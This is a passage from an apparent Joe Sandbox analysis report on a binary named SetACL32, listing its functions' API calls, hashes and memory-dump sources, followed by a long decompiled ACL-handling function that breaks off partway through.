              • CompareStringW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,012E30AF,-00000002,00000000,00000000,00000000,00000000), ref: 012DA6A8
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: CompareString
              • String ID:
              • API String ID: 1825529933-0
              • Opcode ID: 0a164c2cd6179342ab41c36a7d1d3cda4813344cad6be9567abce5d68815af6a
              • Instruction ID: 6b6b6e2b5f2f234c82cad08ff1e1a23782cfe2221912939e525805088247e21e
              • Opcode Fuzzy Hash: 0a164c2cd6179342ab41c36a7d1d3cda4813344cad6be9567abce5d68815af6a
              • Instruction Fuzzy Hash: C4F07A3241021EBBCF125F90DC08DEE3F66EF487A0F068110FA196A020CB72C872AB95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DBD35 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: __cftof
              • String ID:
              • API String ID: 1622813385-0
              • Opcode ID: 2bd2df2c7be6e82450719d65d8b08016f7c50b102e48c086145603f19964cc2e
              • Instruction ID: c469464342a6c36ee2ccd9bd56189cf0542c35bfbf925a52078b17078406e5a2
              • Opcode Fuzzy Hash: 2bd2df2c7be6e82450719d65d8b08016f7c50b102e48c086145603f19964cc2e
              • Instruction Fuzzy Hash: 5A315B325341166AD7296E3CCCA697E77B89F57D34BA6021AEB249B0C0EF31D8438691
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D6A15 Relevance: 1.6, APIs: 1, Instructions: 87COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: c74675ce076de27e230bf8c9bd16f81f6bb80a89aa4bdfb6ebb7662e446c4ec7
              • Instruction ID: f29fa4886b032e3539f42bd3c7c1e2face8f1b039ff432ea8653648092fc5c59
              • Opcode Fuzzy Hash: c74675ce076de27e230bf8c9bd16f81f6bb80a89aa4bdfb6ebb7662e446c4ec7
              • Instruction Fuzzy Hash: AA319C76A106119F8B14CF9EC48089EBBF2FF89320726C265D659EB361C330AD45CB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DA553 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1557050644d6a30629d7e631a66ddf76721908bc6bc8c2be1414c75271d1ec2c
              • Instruction ID: 746060c623cf27ad969f8b3854e7407820bd84eb383eb8af7b473c5ab33a11ba
              • Opcode Fuzzy Hash: 1557050644d6a30629d7e631a66ddf76721908bc6bc8c2be1414c75271d1ec2c
              • Instruction Fuzzy Hash: F301B533A202169FAF26CD6DFC51E9A37DAABC53207548121FE05CB188DB30D9419790
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012CF570 Relevance: 1.5, APIs: 1, Instructions: 44COMMONLIBRARYCODE
              Download Yara Rule
              APIs
                • Part of subcall function 012D7FB2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,012D73C2,00000001,00000364,00000006,000000FF,?,?,012D3E45,012D8035,?,?,012D6ACD), ref: 012D7FF3
              • _free.LIBCMT ref: 012CF590
                • Part of subcall function 012D800F: HeapFree.KERNEL32(00000000,00000000,?,012D6ACD), ref: 012D8025
                • Part of subcall function 012D800F: GetLastError.KERNEL32(?,?,012D6ACD), ref: 012D8037
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: Heap$AllocateErrorFreeLast_free
              • String ID:
              • API String ID: 314386986-0
              • Opcode ID: 2ad285a6610fc3b095273d84f05ba3fbb0c2a7b99620578456285f85846583e9
              • Instruction ID: ae90cdab5320658004ff9bd689630e4a09e4ec948566418a1fb16604c362d335
              • Opcode Fuzzy Hash: 2ad285a6610fc3b095273d84f05ba3fbb0c2a7b99620578456285f85846583e9
              • Instruction Fuzzy Hash: 05010CB6D0021AAFCB10DFA9C441A9EFBB8FB48710F104266EA14E7240E774A645CBD0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012CCD74 Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,0130B6D4,01309AA4,00000007,012CA0BD,0130B6D4,01306D6C,EDD8D3B4), ref: 012CCDD4
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: DispatcherExceptionUser
              • String ID:
              • API String ID: 6842923-0
              • Opcode ID: 9546fc8dce33d2d6b996109ce2e47eecd98857f3c149ad0a0658af56da6c29d8
              • Instruction ID: dff4dd3acb8fac0e0ee656760bb065b88c67ded3ad5e6ac131eeceaeafc25d97
              • Opcode Fuzzy Hash: 9546fc8dce33d2d6b996109ce2e47eecd98857f3c149ad0a0658af56da6c29d8
              • Instruction Fuzzy Hash: F4018F75900309ABDB019F5CD494BAEBFB8EF44B00F15415AEB05AB391D770A901CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D7FB2 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,012D73C2,00000001,00000364,00000006,000000FF,?,?,012D3E45,012D8035,?,?,012D6ACD), ref: 012D7FF3
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: b8a8f2b82ddf008b44151e6f6ec707fe6c71ec88f47ac948aa077d3146c6ecb9
              • Instruction ID: a34edbc217fdb9de34bcdcadb8040ccbb2c02364106c3a1341a698c705377c1f
              • Opcode Fuzzy Hash: b8a8f2b82ddf008b44151e6f6ec707fe6c71ec88f47ac948aa077d3146c6ecb9
              • Instruction Fuzzy Hash: BDF0E932634127AFEB315A2ADC04E6B7B98AF50774B0540A1EA099B1C4DE74D80182E0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012E342D Relevance: 1.5, APIs: 1, Instructions: 36COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 012D8049: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,012DDAF3,?,00000000,?,012E0312,?,00000004,?,?,?,?,012D6975), ref: 012D807B
              • _free.LIBCMT ref: 012E344D
                • Part of subcall function 012D800F: HeapFree.KERNEL32(00000000,00000000,?,012D6ACD), ref: 012D8025
                • Part of subcall function 012D800F: GetLastError.KERNEL32(?,?,012D6ACD), ref: 012D8037
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: Heap$AllocateErrorFreeLast_free
              • String ID:
              • API String ID: 314386986-0
              • Opcode ID: 8205bd5e48c73dba42df0bbef7b2b95ea4950ba89cc6e1e519b6e262bbfd22cf
              • Instruction ID: 249888298606a8d16a94a803747033630631427cab52568cd63f77a6e4d8e988
              • Opcode Fuzzy Hash: 8205bd5e48c73dba42df0bbef7b2b95ea4950ba89cc6e1e519b6e262bbfd22cf
              • Instruction Fuzzy Hash: 5CF06D721157009FE3359F49D805BA2F7FCEF90B22F10842FD29A8B5A0DBB4A4418B94
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012D8049 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,012DDAF3,?,00000000,?,012E0312,?,00000004,?,?,?,?,012D6975), ref: 012D807B
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: AllocateHeap
              • String ID:
              • API String ID: 1279760036-0
              • Opcode ID: b4aec8f3ef5eba80469e9d39fe7263a146a1fc8fb4e1df3a99681a5bda9609f1
              • Instruction ID: 3475a318b4b3a258ad74628f6ce67c15c807806f4e6140a6d8b5cee839c9b7af
              • Opcode Fuzzy Hash: b4aec8f3ef5eba80469e9d39fe7263a146a1fc8fb4e1df3a99681a5bda9609f1
              • Instruction Fuzzy Hash: BCE092312316679BF6313769DC04B7B7AACEF557B2F090121EF86960C4DBA0CC4082E1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012910E0 Relevance: 1.5, APIs: 1, Instructions: 27networkCOMMON
              Download Yara Rule
              APIs
              • WSAStartup.WS2_32(00000002,00000002), ref: 01291120
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: Startup
              • String ID:
              • API String ID: 724789610-0
              • Opcode ID: b9ae92b8b032f4e57c5719e02a7c0e0ffb2c4ed8fe9ac03def5129b802e0b939
              • Instruction ID: 3242f87ef3f43ba10acf448e144a974f86f6cf6019c4a0877f396364b9b529eb
              • Opcode Fuzzy Hash: b9ae92b8b032f4e57c5719e02a7c0e0ffb2c4ed8fe9ac03def5129b802e0b939
              • Instruction Fuzzy Hash: 5FF0A0709202044FD725AB689816B75B3D8EB05324F40062ADA5DCB284EA20A5118BC3
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012DA845 Relevance: 1.5, APIs: 1, Instructions: 23COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,?,?,012D9092,?,00000055,00000050), ref: 012DA870
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: DefaultUser
              • String ID:
              • API String ID: 3358694519-0
              • Opcode ID: 9985c788786131f3fd43dbde1f9a5292ab23a36fe6ca2026e148b5ce1f2e2d04
              • Instruction ID: 128840a8f9f3044c7bcfa5fd25ed706196fdd2e5de221f27cab6ef65f967208a
              • Opcode Fuzzy Hash: 9985c788786131f3fd43dbde1f9a5292ab23a36fe6ca2026e148b5ce1f2e2d04
              • Instruction Fuzzy Hash: E6E04632410229B7CB222B65EC0AEAE7F19EB547A0B058021FE089B120CA71C9629B84
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Function 012BFC50 Relevance: 59.6, APIs: 29, Strings: 4, Instructions: 1862COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 74%
              			E012BFC50(void* __ebx, intOrPtr* __ecx, void* __fp0, signed int _a4, long _a8, signed int _a12, signed int _a16, char _a20, void* _a24, signed int _a28, int _a32, signed int _a36, intOrPtr _a48, intOrPtr _a52) {
				void* _v0;
				intOrPtr _v4;
				char _v8;
				int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				long _v28;
				long _v32;
				long _v36;
				signed int _v44;
				signed int _v48;
				int _v52;
				int _v56;
				char _v69;
				char _v73;
				struct _SECURITY_DESCRIPTOR _v76;
				char _v77;
				long _v80;
				char _v81;
				long _v84;
				long _v88;
				int _v92;
				long _v96;
				long _v100;
				long _v104;
				long _v108;
				long _v112;
				long _v116;
				char _v120;
				short _v124;
				signed int _v128;
				signed int _v132;
				int _v136;
				signed int _v140;
				char _v144;
				short _v152;
				intOrPtr _v156;
				char _v158;
				char _v159;
				int _v160;
				signed int _v164;
				struct _SECURITY_DESCRIPTOR* _v168;
				signed int _v172;
				char _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				int _v220;
				char _v221;
				signed int _v224;
				int _v228;
				void* _v232;
				int _v236;
				signed int _v240;
				int _v244;
				signed int _v248;
				int _v252;
				int _v260;
				short _v268;
				void _v272;
				signed int _v276;
				int _v292;
				char _v296;
				signed int _v300;
				signed int _v304;
				char _v306;
				short _v308;
				intOrPtr _v312;
				signed int _v316;
				char _v320;
				long _v324;
				char _v325;
				void* _v326;
				int _v328;
				void* _v332;
				struct _ACL* _v336;
				signed int _v340;
				long _v344;
				signed int _v348;
				void* _v352;
				signed int _v356;
				int _v360;
				long _v364;
				signed int _v368;
				signed int _v369;
				signed int _v376;
				int _v380;
				int _v384;
				signed int _v388;
				struct _ACL* _v397;
				struct _ACL* _v401;
				union _ACL_INFORMATION_CLASS _v417;
				char _v425;
				intOrPtr _v465;
				char _v481;
				signed int _v489;
				int _v709;
				signed int _v777;
				int _v797;
				int _v801;
				int _v813;
				char* _v837;
				char* _v841;
				intOrPtr _v853;
				intOrPtr _v857;
				void* __edi;
				void* __esi;
				intOrPtr _t925;
				signed int _t931;
				signed int _t932;
				signed char _t937;
				signed int _t943;
				signed int _t944;
				signed int _t958;
				intOrPtr _t959;
				signed int _t961;
				void* _t962;
				void* _t963;
				signed int _t969;
				signed int _t971;
				signed int _t975;
				signed int _t979;
				signed int _t983;
				signed int _t989;
				signed int _t990;
				intOrPtr _t992;
				long _t993;
				signed int _t996;
				signed int _t997;
				signed int _t999;
				signed int _t1002;
				signed int _t1003;
				void* _t1004;
				signed int _t1010;
				int _t1011;
				signed int _t1013;
				struct _SECURITY_DESCRIPTOR* _t1015;
				signed int _t1035;
				signed int _t1038;
				int _t1040;
				signed int _t1045;
				struct _SECURITY_DESCRIPTOR* _t1047;
				int _t1051;
				signed int _t1061;
				struct _SECURITY_DESCRIPTOR* _t1063;
				int _t1067;
				intOrPtr _t1089;
				intOrPtr _t1093;
				signed int _t1099;
				signed int _t1101;
				long _t1102;
				struct _SECURITY_DESCRIPTOR* _t1105;
				int _t1109;
				intOrPtr _t1113;
				intOrPtr _t1117;
				intOrPtr _t1122;
				intOrPtr _t1126;
				short* _t1138;
				signed int _t1140;
				signed int _t1141;
				signed int _t1142;
				intOrPtr _t1144;
				signed int _t1145;
				signed int _t1147;
				intOrPtr _t1149;
				signed int _t1159;
				intOrPtr _t1161;
				short* _t1175;
				short* _t1178;
				short* _t1179;
				signed int _t1187;
				intOrPtr _t1189;
				intOrPtr _t1194;
				int _t1198;
				int _t1202;
				intOrPtr _t1206;
				signed int _t1210;
				signed int _t1214;
				signed int _t1218;
				signed int _t1221;
				struct _SECURITY_DESCRIPTOR* _t1223;
				int _t1227;
				signed int _t1231;
				signed int _t1232;
				long _t1233;
				signed int _t1235;
				void* _t1238;
				void* _t1239;
				struct _SECURITY_DESCRIPTOR* _t1242;
				signed int _t1243;
				long _t1246;
				signed int _t1248;
				signed int _t1250;
				signed int _t1252;
				signed int _t1254;
				void* _t1257;
				signed int _t1265;
				void* _t1266;
				signed int _t1269;
				signed int _t1271;
				signed int _t1278;
				signed int _t1280;
				signed int _t1284;
				signed int _t1286;
				signed int _t1287;
				signed int _t1288;
				signed int _t1289;
				signed int _t1295;
				signed int _t1303;
				signed int _t1305;
				signed int _t1310;
				signed int* _t1314;
				signed char _t1315;
				void* _t1316;
				long _t1323;
				signed int _t1324;
				signed int _t1325;
				signed int _t1326;
				signed int _t1327;
				signed int _t1328;
				signed int _t1331;
				signed int _t1332;
				signed int _t1333;
				signed int _t1334;
				void* _t1344;
				void* _t1348;
				signed int _t1352;
				signed int _t1354;
				signed int _t1355;
				signed int _t1357;
				int _t1358;
				long _t1359;
				void* _t1360;
				signed int _t1361;
				signed int _t1364;
				signed int _t1365;
				signed int _t1367;
				int _t1368;
				long _t1369;
				void* _t1370;
				signed int _t1371;
				struct _ACL* _t1378;
				struct _ACL* _t1379;
				signed int _t1386;
				signed int _t1389;
				signed int _t1391;
				signed int _t1395;
				struct _SECURITY_DESCRIPTOR* _t1397;
				signed int _t1398;
				WCHAR* _t1401;
				signed int _t1407;
				void* _t1409;
				void* _t1414;
				void* _t1425;
				void* _t1426;
				void* _t1427;
				struct _ACL* _t1428;
				void* _t1430;
				intOrPtr _t1433;
				void* _t1434;
				signed int _t1438;
				long _t1439;
				signed char _t1445;
				signed int _t1459;
				signed char _t1460;
				intOrPtr* _t1462;
				signed int _t1463;
				signed int _t1466;
				long _t1471;
				struct _SECURITY_DESCRIPTOR* _t1475;
				int _t1483;
				struct _SECURITY_DESCRIPTOR* _t1484;
				int _t1485;
				struct _SECURITY_DESCRIPTOR* _t1488;
				int _t1489;
				intOrPtr _t1494;
				intOrPtr _t1495;
				struct _SECURITY_DESCRIPTOR* _t1498;
				int _t1499;
				intOrPtr _t1500;
				char _t1501;
				short _t1502;
				char _t1503;
				short _t1508;
				short _t1511;
				intOrPtr _t1522;
				intOrPtr _t1523;
				int _t1524;
				int _t1525;
				intOrPtr _t1526;
				signed int _t1527;
				signed int _t1528;
				struct _SECURITY_DESCRIPTOR* _t1532;
				int _t1533;
				void* _t1542;
				signed int _t1544;
				signed int _t1548;
				signed int _t1558;
				signed int* _t1560;
				signed int _t1562;
				signed int _t1563;
				void* _t1565;
				void* _t1567;
				signed int* _t1571;
				intOrPtr _t1572;
				signed int _t1575;
				signed int _t1576;
				signed int _t1579;
				unsigned int _t1581;
				unsigned int _t1583;
				void* _t1584;
				signed int _t1585;
				void* _t1586;
				unsigned int _t1588;
				signed int _t1589;
				void* _t1590;
				signed int _t1591;
				signed int _t1592;
				unsigned int _t1594;
				signed int _t1595;
				signed int _t1596;
				signed int _t1597;
				void* _t1598;
				void* _t1599;
				void* _t1600;
				signed int _t1601;
				signed int _t1602;
				void* _t1603;
				void* _t1604;
				signed int _t1605;
				void* _t1606;
				signed int _t1607;
				void* _t1608;
				signed int _t1609;
				signed int _t1610;
				signed int _t1611;
				signed int _t1612;
				signed int _t1613;
				signed int _t1614;
				void* _t1615;
				void* _t1616;
				void* _t1617;
				void* _t1618;
				void* _t1619;
				void* _t1620;
				void* _t1621;
				void* _t1622;
				void* _t1623;
				signed int _t1624;
				void* _t1625;
				signed int _t1627;
				void* _t1628;
				signed int _t1632;
				void* _t1633;
				signed int _t1635;
				signed int _t1636;
				void* _t1637;
				void* _t1638;
				void* _t1639;
				void* _t1640;
				signed char _t1641;
				void* _t1642;
				signed char _t1643;
				void* _t1645;
				struct _ACL* _t1646;
				void* _t1648;
				long _t1649;
				struct _SECURITY_DESCRIPTOR* _t1650;
				long* _t1658;
				long _t1660;
				void* _t1661;
				signed int _t1662;
				void* _t1664;
				signed int _t1665;
				struct _ACL* _t1667;
				long _t1668;
				signed int _t1670;
				void* _t1671;
				void* _t1672;
				intOrPtr _t1674;
				void* _t1677;
				intOrPtr _t1679;
				signed int _t1682;
				signed int _t1683;
				signed int _t1685;
				signed int _t1687;
				signed int _t1689;
				signed int _t1692;
				signed int _t1697;
				signed int _t1699;
				signed int _t1702;
				void* _t1704;
				signed int _t1709;
				void* _t1710;
				void* _t1719;
				void* _t1721;
				void* _t1722;
				void* _t1735;

				_t1735 = __fp0;
				_t1425 = __ebx;
				_t1658 = __ecx;
				_t919 =  *(__ecx + 0xc);
				 *((intOrPtr*)(__ecx)) = 0x12ffef0;
				if( *(__ecx + 0xc) != 0 &&  *((char*)(__ecx + 0x38)) != 0) {
					E012D3434(_t919);
					_t1697 = _t1697 + 4;
					 *(__ecx + 0xc) = 0;
					 *((char*)(__ecx + 0x38)) = 0;
				}
				_t920 =  *(_t1658 + 4);
				if( *(_t1658 + 4) != 0 &&  *((char*)(_t1658 + 0x39)) != 0) {
					E012D3434(_t920);
					_t1697 = _t1697 + 4;
					 *(_t1658 + 4) = 0;
					 *((char*)(_t1658 + 0x39)) = 0;
				}
				_t921 =  *(_t1658 + 8);
				if( *(_t1658 + 8) != 0 &&  *((char*)(_t1658 + 0x3a)) != 0) {
					E012D3434(_t921);
					_t1697 = _t1697 + 4;
					 *(_t1658 + 8) = 0;
					 *((char*)(_t1658 + 0x3a)) = 0;
				}
				_t922 =  *(_t1658 + 0x40);
				if( *(_t1658 + 0x40) != 0) {
					E012D3434(_t922);
					_t1697 = _t1697 + 4;
					 *(_t1658 + 0x40) = 0;
				}
				_t923 =  *(_t1658 + 0x3c);
				if( *(_t1658 + 0x3c) != 0) {
					E012D3434(_t923);
					_t1697 = _t1697 + 4;
					 *(_t1658 + 0x3c) = 0;
				}
				_t1438 =  *(_t1658 + 0x28);
				if(_t1438 < 8) {
					L18:
					 *(_t1658 + 0x24) = 0;
					 *(_t1658 + 0x28) = 7;
					 *((short*)(_t1658 + 0x14)) = 0;
					return 0;
				} else {
					_t925 =  *((intOrPtr*)(_t1658 + 0x14));
					_t1439 = 2 + _t1438 * 2;
					if(_t1439 < 0x1000) {
						L17:
						_push(_t1439);
						E012CAE27(_t925);
						goto L18;
					} else {
						_t1572 =  *((intOrPtr*)(_t925 - 4));
						_t1439 = _t1439 + 0x23;
						if(_t925 - _t1572 + 0xfffffffc > 0x1f) {
							E012CF35F(_t1425, _t1439, _t1572, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t1685 = _t1697;
							_push(0xffffffff);
							_push(0x12ec36d);
							_push( *[fs:0x0]);
							_t1699 = _t1697 - 0x74;
							_t931 =  *0x1309018; // 0xedd8d3b4
							_t932 = _t931 ^ _t1685;
							_v24 = _t932;
							_push(_t1425);
							_push(_t1658);
							_push(_t1639);
							_push(_t932);
							 *[fs:0x0] =  &_v20;
							_t1660 = _t1439;
							_v12 = 0;
							_t1440 = _a24;
							_v73 = 0;
							_v116 = 0;
							_v96 = 0;
							_v80 = 0;
							_v81 = 0;
							_v88 = 0;
							_v112 = 0;
							_v108 = 0;
							_v104 = 0;
							_v100 = 0;
							__eflags = _t1440;
							if(_t1440 == 0) {
								L126:
								_t1660 = 3;
								goto L127;
							} else {
								_t1425 = _a4;
								__eflags = _t1425;
								if(_t1425 == 0) {
									goto L126;
								} else {
									_t1639 = _t1660 + 0x14;
									_t1314 =  &_a12;
									__eflags = _t1639 - _t1314;
									if(_t1639 != _t1314) {
										__eflags = _a32 - 8;
										_t1418 =  >=  ? _a12 : _t1314;
										_t1440 = _t1639;
										E012A1EE0(_t1425, _t1639, 0x20000, _t1639, _t1660,  >=  ? _a12 : _t1314, _t1639);
										_t1574 = 0x20000;
									}
									_t1315 = _a8;
									 *(_t1660 + 0x2c) = _t1425;
									 *(_t1660 + 0x30) = _t1315;
									__eflags = _t1315 & 0x00000008;
									if((_t1315 & 0x00000008) == 0) {
										L36:
										__eflags = _t1425 - 1;
										if(_t1425 != 1) {
											__eflags = _t1425 - 4;
											if(__eflags != 0) {
												__eflags = _t1425 - 0xb;
												if(_t1425 != 0xb) {
													goto L54;
												} else {
													_t1722 = _t1699 - 0x18;
													E012983B0(_t1722, _t1639);
													_t1574 = 0;
													_t1440 =  &_v76;
													_t1389 = E012C3AF0(_t1425,  &_v76, 0, _t1639, _t1660, __eflags);
													_t1699 = _t1722 + 0x18;
													 *(_t1660 + 0x10) = _t1389;
													__eflags = _t1389;
													if(_t1389 == 0) {
														goto L67;
													} else {
														_t1660 = _t1425 - 6;
														goto L127;
													}
												}
											} else {
												_t1440 =  *(_t1660 + 0x34);
												_push(0x20000);
												_push(0);
												_t1391 = L012B5990( *(_t1660 + 0x34), 0x20000, __eflags, _t1735, _t1639,  &_v92);
												_v112 = _t1391;
												__eflags = _t1391;
												if(_t1391 == 0) {
													_t1440 = _v92;
													_t1425 = 0;
													_v88 = _t1440;
													_v112 = _t1391;
													__eflags = _t1440;
													if(_t1440 == 0) {
														goto L54;
													} else {
														goto L46;
													}
												} else {
													_v92 = 0;
													goto L57;
												}
											}
										} else {
